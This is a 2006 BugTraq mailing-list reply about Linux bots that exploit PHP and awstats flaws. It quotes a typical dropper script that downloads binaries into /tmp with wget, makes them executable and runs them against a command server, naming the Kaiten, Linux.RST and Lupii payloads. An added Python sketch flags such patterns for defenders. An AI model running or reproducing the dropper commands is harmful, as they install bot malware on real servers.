BugTraq
Re: new linux malware Feb 22 2006 08:00PM
Jamie Riden (jamie riden gmail com)
On 21/02/06, Gadi Evron <ge (at) linuxbox (dot) org> wrote:
>
> Indeed, it has become an annoying trend everybody talks about but nobody
> writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either
> vulnerabilities in known applications such as WordPress, PHPBB, Drupal,
> etc. or actually trying different permutations to attack the site.
<snip>
> Anyone else seeing their web server logs going crazy with new patterns
> every day? Email me, I am starting a sharing system where these can be
> shared mutually so we can better protect ourselves, create signatures, etc.

I got as far as looking at mwcollect and nepenthes to see if anyone
had written plugins to slurp these bots, but couldn't find anything.
Typically they're some sort of variant on:

#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd

with payloads being variously identified as Kaiten, Linux.RST and
Lupii by Symantec AV. This is just stuff trying the old awstats
exploit; I haven't coded up any handlers for the xml-rpc or other
exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable
:) collecting the malware?

cheers,
Jamie
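
A defender's sketch for recognising scripts of the shape quoted in the post above, added here as an example and not part of the original message: it follows each downloaded file through `mv`, `chmod` and execution, including the bare-name launch that only works because `PATH` is set to ".". The trait names and the sample hosts are made up for illustration.

```python
import shlex

# Constructed sample shaped like the script in the post; hosts are placeholders
# from the documentation ranges 192.0.2.0/24 and 198.51.100.0/24.
SAMPLE = """#!/bin/bash
cd /tmp
wget 192.0.2.36/ping
mv ping cb
chmod +x cb
./cb 198.51.100.251 8080 &
killall -9 lordnikonz
wget 192.0.2.36/images/logo.jpg
mv logo.jpg httpd
chmod +x httpd
export PATH="."
httpd
"""

def dropper_findings(script):
    """Follow downloaded files through renames, chmod and execution."""
    found, fetched, runnable = set(), set(), set()
    for raw in script.splitlines():
        try:
            cmd, *args = shlex.split(raw.strip().rstrip("&"), comments=True)
        except ValueError:      # blank line, comment or unbalanced quotes
            continue
        if cmd == "cd" and args[:1] in (["/tmp"], ["/var/tmp"], ["/dev/shm"]):
            found.add("world-writable-workdir")
        elif cmd in ("wget", "curl"):
            # Track the basename each URL is saved under.
            fetched.update(a.rstrip("/").rsplit("/", 1)[-1]
                           for a in args if not a.startswith("-"))
        elif cmd == "mv" and len(args) == 2 and args[0] in fetched:
            fetched.add(args[1])
            found.add("renamed-download")
        elif cmd == "chmod" and args and "x" in args[0] and fetched & set(args[1:]):
            runnable |= fetched & set(args[1:])
            found.add("chmod-download")
        elif cmd == "killall":
            found.add("kills-process")
        elif cmd == "export" and "PATH=." in args:
            found.add("path-dot")
        elif cmd.startswith("./") and cmd[2:] in runnable:
            found.add("exec-download")
        elif cmd in runnable and "path-dot" in found:
            # A bare name resolves to the dropped file once PATH is ".".
            found.add("exec-via-dot-path")
    return found
```

Symbolic modes such as `+x` are the only `chmod` form recognised here; numeric modes would need an extra check.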
